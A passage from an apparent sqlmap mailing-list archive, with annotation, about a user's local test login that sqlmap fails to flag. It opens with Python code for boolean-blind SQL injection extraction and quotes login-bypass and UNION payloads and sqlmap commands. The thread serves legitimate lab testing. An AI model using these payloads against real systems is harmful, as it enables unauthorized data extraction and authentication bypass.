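    return resp[0] == 302


def extract(page: FakeLoginPage, expr: str, max_len: int = 64) -> str:
    """Boolean-blind extraction of the string `expr` evaluates to, one character
    at a time by binary search over its code point (7 requests per character).
    substr() past the end yields '' and unicode('') is NULL, so the comparison
    is never true and the search settles on 0: that is the terminator."""
    result = ""
    for i in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # Breaks out of user='...' and appends the condition; '-- ' drops the
            # rest of the original WHERE clause (MySQL would use '#' here).
            payload = f"' OR unicode(substr(({expr}),{i},1)) > {mid} -- "
            if query_is_true(page.post(payload, "irrelevant")):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


def classify(page: FakeLoginPage) -> Tuple[int, int, int]:
    """The three responses reported in the thread, in order: a normal failed
    login (error page), the ' OR 1=1 payload (redirect), a bare quote (error)."""
    return (
        page.post("lol", "lol")[0],
        page.post("' OR 1=1 -- ", "x")[0],
        page.post("'", "x")[0],
    )
```

With the real target the same idea is what --code=302 gives sqlmap; if the application followed the redirect server-side and both branches came back as 200, --string on a fragment of the Login.php error text would be the signal instead.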
From: Daniele B. <bbi...@gm...> - 2016-12-04 16:10:25
anyway...could anyone take the source and try it himself?

If it can help I'm using PHP v7.0 with php-mysql libraries

2016-12-04 17:00 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
> @Miroslav Ah ok...I don't know, I tried everything...
>
> 2016-12-04 16:57 GMT+01:00 Miroslav Stampar <mir...@gm...>:
>> UA == User-Agent
>>
>> On Dec 4, 2016 16:57, "Daniele Bianchin" <bbi...@gm...> wrote:
>>> @Miroslav. What does UA mean?
>>>
>>> @Brandon tried with sqlmap -u "127.0.0.1/test/Login.php" --data="user=lol&password=lol" --dbs --suffix="#" -v 3 --tamper=space2plus and it didn't work.
>>>
>>> 2016-12-04 16:50 GMT+01:00 Miroslav Stampar <mir...@gm...>:
>>>> I am kind of confused. You said that it's your application, right? Why would your application care about UA? Also, you've sent source code which doesn't look at the UA.
>>>>
>>>> Bye
>>>>
>>>> On Dec 4, 2016 16:47, "Daniele Bianchin" <bbi...@gm...> wrote:
>>>>> Ok, I made a test with BurpSuite as Brandon said.
>>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>>>>> The same payload with sqlmap did not.
>>>>>
>>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>>
>>>>> the first is made manually with Firefox, the second with sqlmap...
>>>>> should I change the user-agent in sqlmap?
>>>>>
>>>>> 2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>>>>>> Ok, I made a test with BurpSuite as Brandon said.
>>>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>>>>>> The same payload with sqlmap did not.
>>>>>>
>>>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>>>
>>>>>> the first is made manually with Firefox, the second with sqlmap...
>>>>>> should I change the user-agent in sqlmap?
>>>>>>
>>>>>> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:
>>>>>>> You can add --proxy and make sqlmap pass all requests through Burp Suite or another proxy so you can see what the difference is between the requests sqlmap creates and the ones you make by hand.
>>>>>>>
>>>>>>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>>
>>>>>>> This is a straightforward case. You are messing something up.
>>>>>>>
>>>>>>> Use username=foobar&password=foobar in POST data. Don't put an SQLi payload anywhere in advance. Use --level=3 --risk=3
>>>>>>>
>>>>>>> As said, you are doing something really really wrong here.
>>>>>>>
>>>>>>> Bye
>>>>>>>
>>>>>>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...> wrote:
>>>>>>>> Hi!
>>>>>>>> I have an issue with sqlmap.
>>>>>>>> I created my own fake login in order to test blind SQL injection but every time I make a test sqlmap says it isn't exploitable.
>>>>>>>> I tried to add a suffix, set level to 5, set risk to 3, set the not-string option but sqlmap still does not work with it.
>>>>>>>> The login source is: http://pastebin.com/xzKZJNB1
>>>>>>>>
>>>>>>>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work.
>>>>>>>> What should I do?
>>>>>>>>
>>>>>>>> Thanks in advance!
>>>>>>>>
>>>>>>>> Daniele.
>>>>>>>
>>>>>>> --
>>>>>>> Miroslav Stampar
>>>>>>> http://about.me/stamparm
From: Daniele B. <bbi...@gm...> - 2016-12-04 16:00:36
@Miroslav Ah ok...I don't know, I tried everything...

2016-12-04 16:57 GMT+01:00 Miroslav Stampar <mir...@gm...>:
> UA == User-Agent
>
> On Dec 4, 2016 16:57, "Daniele Bianchin" <bbi...@gm...> wrote:
>> @Miroslav. What does UA mean?
>>
>> @Brandon tried with sqlmap -u "127.0.0.1/test/Login.php" --data="user=lol&password=lol" --dbs --suffix="#" -v 3 --tamper=space2plus and it didn't work.
>>
>> 2016-12-04 16:50 GMT+01:00 Miroslav Stampar <mir...@gm...>:
>>> I am kind of confused. You said that it's your application, right? Why would your application care about UA? Also, you've sent source code which doesn't look at the UA.
>>>
>>> Bye
>>>
>>> On Dec 4, 2016 16:47, "Daniele Bianchin" <bbi...@gm...> wrote:
>>>> Ok, I made a test with BurpSuite as Brandon said.
>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>>>> The same payload with sqlmap did not.
>>>>
>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>
>>>> the first is made manually with Firefox, the second with sqlmap...
>>>> should I change the user-agent in sqlmap?
>>>>
>>>> 2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>>>>> Ok, I made a test with BurpSuite as Brandon said.
>>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>>>>> The same payload with sqlmap did not.
>>>>>
>>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>>
>>>>> the first is made manually with Firefox, the second with sqlmap...
>>>>> should I change the user-agent in sqlmap?
>>>>>
>>>>> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:
>>>>>> You can add --proxy and make sqlmap pass all requests through Burp Suite or another proxy so you can see what the difference is between the requests sqlmap creates and the ones you make by hand.
>>>>>>
>>>>>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>>
>>>>>> This is a straightforward case. You are messing something up.
>>>>>>
>>>>>> Use username=foobar&password=foobar in POST data. Don't put an SQLi payload anywhere in advance. Use --level=3 --risk=3
>>>>>>
>>>>>> As said, you are doing something really really wrong here.
>>>>>>
>>>>>> Bye
>>>>>>
>>>>>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...> wrote:
>>>>>>> Hi!
>>>>>>> I have an issue with sqlmap.
>>>>>>> I created my own fake login in order to test blind SQL injection but every time I make a test sqlmap says it isn't exploitable.
>>>>>>> I tried to add a suffix, set level to 5, set risk to 3, set the not-string option but sqlmap still does not work with it.
>>>>>>> The login source is: http://pastebin.com/xzKZJNB1
>>>>>>>
>>>>>>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work.
>>>>>>> What should I do?
>>>>>>>
>>>>>>> Thanks in advance!
>>>>>>>
>>>>>>> Daniele.
>>>>>>
>>>>>> --
>>>>>> Miroslav Stampar
>>>>>> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2016-12-04 15:58:04
UA == User-Agent

On Dec 4, 2016 16:57, "Daniele Bianchin" <bbi...@gm...> wrote:
> @Miroslav. What does UA mean?
>
> @Brandon tried with sqlmap -u "127.0.0.1/test/Login.php" --data="user=lol&password=lol" --dbs --suffix="#" -v 3 --tamper=space2plus and it didn't work.
>
> 2016-12-04 16:50 GMT+01:00 Miroslav Stampar <mir...@gm...>:
>> I am kind of confused. You said that it's your application, right? Why would your application care about UA? Also, you've sent source code which doesn't look at the UA.
>>
>> Bye
>>
>> On Dec 4, 2016 16:47, "Daniele Bianchin" <bbi...@gm...> wrote:
>>> Ok, I made a test with BurpSuite as Brandon said.
>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>>> The same payload with sqlmap did not.
>>>
>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>
>>> the first is made manually with Firefox, the second with sqlmap...
>>> should I change the user-agent in sqlmap?
>>>
>>> 2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>>>> Ok, I made a test with BurpSuite as Brandon said.
>>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>>>> The same payload with sqlmap did not.
>>>>
>>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>>
>>>> the first is made manually with Firefox, the second with sqlmap...
>>>> should I change the user-agent in sqlmap?
>>>>
>>>> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:
>>>>> You can add --proxy and make sqlmap pass all requests through Burp Suite or another proxy so you can see what the difference is between the requests sqlmap creates and the ones you make by hand.
>>>>>
>>>>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>>
>>>>> This is a straightforward case. You are messing something up.
>>>>>
>>>>> Use username=foobar&password=foobar in POST data. Don't put an SQLi payload anywhere in advance. Use --level=3 --risk=3
>>>>>
>>>>> As said, you are doing something really really wrong here.
>>>>>
>>>>> Bye
>>>>>
>>>>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...> wrote:
>>>>>> Hi!
>>>>>> I have an issue with sqlmap.
>>>>>> I created my own fake login in order to test blind SQL injection but every time I make a test sqlmap says it isn't exploitable.
>>>>>> I tried to add a suffix, set level to 5, set risk to 3, set the not-string option but sqlmap still does not work with it.
>>>>>> The login source is: http://pastebin.com/xzKZJNB1
>>>>>>
>>>>>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work.
>>>>>> What should I do?
>>>>>>
>>>>>> Thanks in advance!
>>>>>>
>>>>>> Daniele.
>>>>>
>>>>> --
>>>>> Miroslav Stampar
>>>>> http://about.me/stamparm
From: Daniele B. <bbi...@gm...> - 2016-12-04 15:57:31
@Miroslav. What does UA mean?

@Brandon tried with sqlmap -u "127.0.0.1/test/Login.php" --data="user=lol&password=lol" --dbs --suffix="#" -v 3 --tamper=space2plus and it didn't work.

2016-12-04 16:50 GMT+01:00 Miroslav Stampar <mir...@gm...>:
> I am kind of confused. You said that it's your application, right? Why would your application care about UA? Also, you've sent source code which doesn't look at the UA.
>
> Bye
>
> On Dec 4, 2016 16:47, "Daniele Bianchin" <bbi...@gm...> wrote:
>> Ok, I made a test with BurpSuite as Brandon said.
>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>> The same payload with sqlmap did not.
>>
>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>
>> the first is made manually with Firefox, the second with sqlmap...
>> should I change the user-agent in sqlmap?
>>
>> 2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>>> Ok, I made a test with BurpSuite as Brandon said.
>>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>>> The same payload with sqlmap did not.
>>>
>>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>>
>>> the first is made manually with Firefox, the second with sqlmap...
>>> should I change the user-agent in sqlmap?
>>>
>>> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:
>>>> You can add --proxy and make sqlmap pass all requests through Burp Suite or another proxy so you can see what the difference is between the requests sqlmap creates and the ones you make by hand.
>>>>
>>>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>>
>>>> This is a straightforward case. You are messing something up.
>>>>
>>>> Use username=foobar&password=foobar in POST data. Don't put an SQLi payload anywhere in advance. Use --level=3 --risk=3
>>>>
>>>> As said, you are doing something really really wrong here.
>>>>
>>>> Bye
>>>>
>>>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...> wrote:
>>>>> Hi!
>>>>> I have an issue with sqlmap.
>>>>> I created my own fake login in order to test blind SQL injection but every time I make a test sqlmap says it isn't exploitable.
>>>>> I tried to add a suffix, set level to 5, set risk to 3, set the not-string option but sqlmap still does not work with it.
>>>>> The login source is: http://pastebin.com/xzKZJNB1
>>>>>
>>>>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work.
>>>>> What should I do?
>>>>>
>>>>> Thanks in advance!
>>>>>
>>>>> Daniele.
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
From: Miroslav S. <mir...@gm...> - 2016-12-04 15:51:01
I am kind of confused. You said that it's your application, right? Why would your application care about UA? Also, you've sent source code which doesn't look at the UA.

Bye

On Dec 4, 2016 16:47, "Daniele Bianchin" <bbi...@gm...> wrote:
> Ok, I made a test with BurpSuite as Brandon said.
> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
> The same payload with sqlmap did not.
>
> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>
> the first is made manually with Firefox, the second with sqlmap...
> should I change the user-agent in sqlmap?
>
> 2016-12-04 16:29 GMT+01:00 Daniele Bianchin <bbi...@gm...>:
>> Ok, I made a test with BurpSuite as Brandon said.
>> I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
>> The same payload with sqlmap did not.
>>
>> This is what BurpSuite shows: http://pastebin.com/6ifKNX9k
>>
>> the first is made manually with Firefox, the second with sqlmap...
>> should I change the user-agent in sqlmap?
>>
>> 2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:
>>> You can add --proxy and make sqlmap pass all requests through Burp Suite or another proxy so you can see what the difference is between the requests sqlmap creates and the ones you make by hand.
>>>
>>> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>
>>> This is a straightforward case. You are messing something up.
>>>
>>> Use username=foobar&password=foobar in POST data. Don't put an SQLi payload anywhere in advance. Use --level=3 --risk=3
>>>
>>> As said, you are doing something really really wrong here.
>>>
>>> Bye
>>>
>>> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...> wrote:
>>>> Hi!
>>>> I have an issue with sqlmap.
>>>> I created my own fake login in order to test blind SQL injection but every time I make a test sqlmap says it isn't exploitable.
>>>> I tried to add a suffix, set level to 5, set risk to 3, set the not-string option but sqlmap still does not work with it.
>>>> The login source is: http://pastebin.com/xzKZJNB1
>>>>
>>>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work.
>>>> What should I do?
>>>>
>>>> Thanks in advance!
>>>>
>>>> Daniele.
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
From: Daniele B. <bbi...@gm...> - 2016-12-04 15:46:29
|
Ok, I made a test with BurpSuite as Brandon said.
I tried to inject lol'UNION ALL SELECT NULL,NULL# manually and it worked.
The same payload with sqlmap does not.

This is what BurpSuite shows: http://pastebin.com/6ifKNX9k

The first is made manually with Firefox, the second with sqlmap...
Should I change the user-agent in sqlmap?

2016-12-04 15:39 GMT+01:00 Brandon Perry <bpe...@gm...>:

> You can add --proxy and make sqlmap pass all requests through Burp Suite or
> another proxy so you can see what the difference is between the requests
> sqlmap creates and the ones you make by hand.
>
> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <mir...@gm...> wrote:
>
> This is a straightforward case. You are messing something up.
>
> Use username=foobar&password=foobar in POST data. Don't put an SQLi
> payload anywhere already. Use --level=3 --risk=3
>
> As said, you are doing something really really wrong here.
>
> Bye
>
> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...> wrote:
>
>> Hi!
>> I have an issue with sqlmap.
>> I created my own fake login in order to test blind SQL injection but
>> every time I make a test sqlmap says it isn't exploitable.
>> I tried to add a suffix, set level to 5, set risk to 3, set the not-string
>> option but sqlmap still does not work with it.
>> The login source is: http://pastebin.com/xzKZJNB1
>>
>> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL
>> SELECT NULL;NULL #, etc... and they work.
>> What should I do?
>>
>> Thanks in advance!
>>
>> Daniele.
|
From: Brandon P. <bpe...@gm...> - 2016-12-04 14:39:34
|
You can add --proxy and make sqlmap pass all requests through Burp Suite or another proxy so you can see what the difference is between the requests sqlmap creates and the ones you make by hand.

> On Dec 4, 2016, at 8:27 AM, Miroslav Stampar <mir...@gm...> wrote:
>
> This is a straightforward case. You are messing something up.
>
> Use username=foobar&password=foobar in POST data. Don't put an SQLi payload anywhere already. Use --level=3 --risk=3
>
> As said, you are doing something really really wrong here.
>
> Bye
>
> On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...> wrote:
> Hi!
> I have an issue with sqlmap.
> I created my own fake login in order to test blind SQL injection but every time I make a test sqlmap says it isn't exploitable.
> I tried to add a suffix, set level to 5, set risk to 3, set the not-string option but sqlmap still does not work with it.
> The login source is: http://pastebin.com/xzKZJNB1
>
> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL SELECT NULL;NULL #, etc... and they work.
> What should I do?
>
> Thanks in advance!
>
> Daniele.
|
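Brandon's --proxy suggestion comes down to diffing the two captured requests, and Miroslav's later reply turns on whether the application even reads the User-Agent. As an added example (not code from the list or from sqlmap), this script parses two raw HTTP captures, constructed here as stand-ins for the hand-made and the tool-generated request, decodes the bodies so an encoding difference is not mistaken for a payload difference, and reports what actually differs.

```python
"""Diff a hand-made HTTP request against a tool-generated one.

Added example (not code from the list or from sqlmap): after proxying both
requests through Burp, this shows which parts really differ. Both captures
below are constructed samples, not the poster's real traffic."""
from urllib.parse import parse_qsl

# Constructed stand-in for the request sent by hand from a browser.
MANUAL_REQUEST = """POST /login.php HTTP/1.1
Host: target.example
User-Agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/50.0
Content-Type: application/x-www-form-urlencoded

username=lol'UNION ALL SELECT NULL,NULL#&password=x"""

# Constructed stand-in for the same payload as a tool sends it (URL-encoded).
TOOL_REQUEST = """POST /login.php HTTP/1.1
Host: target.example
User-Agent: sqlmap/1.0 (http://sqlmap.org)
Content-Type: application/x-www-form-urlencoded

username=lol%27UNION%20ALL%20SELECT%20NULL%2CNULL%23&password=x"""


def parse_request(raw):
    """Return (method, path, headers, decoded body params) for a raw request."""
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, path = lines[0].split(" ")[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Decoding the body makes '%27' and a literal quote compare equal, so an
    # encoding difference is not mistaken for a payload difference.
    return method, path, headers, dict(parse_qsl(body, keep_blank_values=True))


def diff_requests(manual_raw, tool_raw):
    """List request-line, header and parameter differences between two captures."""
    m_method, m_path, m_hdr, m_par = parse_request(manual_raw)
    t_method, t_path, t_hdr, t_par = parse_request(tool_raw)
    findings = []
    if (m_method, m_path) != (t_method, t_path):
        findings.append(f"request line: {m_method} {m_path} vs {t_method} {t_path}")
    for name in sorted(set(m_hdr) | set(t_hdr)):
        if m_hdr.get(name) != t_hdr.get(name):
            findings.append(f"header {name}: {m_hdr.get(name)!r} vs {t_hdr.get(name)!r}")
    for name in sorted(set(m_par) | set(t_par)):
        if m_par.get(name) != t_par.get(name):
            findings.append(f"param {name}: {m_par.get(name)!r} vs {t_par.get(name)!r}")
    return findings  # for the samples above: only the User-Agent header differs
```

For the constructed samples the only finding is the User-Agent header; the decoded username parameter is identical in both, so a User-Agent the application never inspects cannot explain a detection difference.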
From: Miroslav S. <mir...@gm...> - 2016-12-04 14:28:06
|
This is a straightforward case. You are messing something up.

Use username=foobar&password=foobar in POST data. Don't put an SQLi payload anywhere already. Use --level=3 --risk=3

As said, you are doing something really really wrong here.

Bye

On Sun, Dec 4, 2016 at 3:06 PM, Daniele Bianchin <bbi...@gm...> wrote:
> Hi!
> I have an issue with sqlmap.
> I created my own fake login in order to test blind SQL injection but
> every time I make a test sqlmap says it isn't exploitable.
> I tried to add a suffix, set level to 5, set risk to 3, set the not-string
> option but sqlmap still does not work with it.
> The login source is: http://pastebin.com/xzKZJNB1
>
> I tried to inject some payloads manually such as ' OR 1=1#, ' UNION ALL
> SELECT NULL;NULL #, etc... and they work.
> What should I do?
>
> Thanks in advance!
>
> Daniele.

--
Miroslav Stampar
http://about.me/stamparm
|